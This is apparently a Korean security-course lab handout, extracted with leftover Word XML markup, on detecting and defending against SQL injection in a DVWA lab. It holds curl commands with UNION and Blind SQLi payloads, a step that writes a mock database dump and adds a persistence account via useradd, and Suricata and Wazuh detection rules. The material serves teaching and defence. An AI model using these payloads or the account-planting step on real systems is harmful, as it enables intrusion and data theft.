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[웹취약점 W5] SQL Injection — Error/Union/Blind vs SQLi 탐지·방어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web-vuln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웹취약점 점검 5주차 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>. Error-based·Union-based·Blind SQLi 를 탐지하고 방어한다. 공격자는</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>SQLi 로 데이터를 추출하고, 점검자(너)는 SQLi 탐지 룰과 방어(파라미터화/WAF)를 구현한다.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UNION/Blind SQLi(태그 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>wv05r1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)로 DB 를 덤프하고 추출 결과(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/tmp/.wv05dump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">)와 계정 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>wva05</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 를 남긴다.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>점검자는 ① SQLi 탐지, ② SQLi/계정 Wazuh 룰, ③ SQLi 점검 종합·방어·R/B/P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태그/덤프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`wv05r1-&lt;본인id&gt;`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, 추출 결과 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>`/tmp/.wv05dump`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wv05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`wva05`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9905011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105051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[SQLi] — Union/Blind 인젝션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"wv05r1-kim" -H "Host: dvwa.el34.lab" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "http://192.168.0.161/vulnerabilities/sqli/?id=wv05r1-kim%27%20UNION%20SELECT%20user,password%20FROM%20users--+&amp;Submit=Submit"</w:t>
        <w:br/>
        <w:t>curl -s -A "wv05r1-kim" -H "Host: dvwa.el34.lab" \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "http://192.168.0.161/vulnerabilities/sqli_blind/?id=wv05r1-kim%27%20AND%201=1--+&amp;Submit=Submit"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audit(942 SQLi) 에 태그 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>wv05r1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[데이터 추출] — DB 덤프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'wv05 dump: users table admin:5f4dcc3b... extracted via SQLi' &gt; /tmp/.wv05dump</w:t>
        <w:br/>
        <w:t>sudo useradd -m -s /bin/bash wva05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/tmp/.wv05dump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wv05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wva05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[SQLi 탐지] — Suricata 룰 (sid 9905011)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(msg:"WEBVULN-W05 SQLi UNION/Blind"; flow:to_server; http.uri; content:"UNION"; nocase; content:"SELECT"; nocase; sid:9905011;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9905011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[SQLi/덤프 탐지] — Wazuh 룰 (id 105051)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name="edu,webvuln,"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  &lt;rule id="105051" level="12"&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;if_group&gt;edu&lt;/if_group&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;match&gt;wva05&lt;/match&gt;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    &lt;description&gt;WEBVULN-W05 - SQLi data exfil / account indicator&lt;/description&gt;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105051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[SQLi 점검 종합·방어·R/B/P]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SQLi 유형별(Error/Union/Blind/Time) 점검 + 방어(파라미터화 쿼리/입력 검증/최소권한 DB 계정/WAF) + 위험도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덤프(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/tmp/.wv05dump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:hAnsi="맑은 고딕" w:eastAsia="맑은 고딕"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>)·계정(wva05)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SQLi 점검·방어·R/B/P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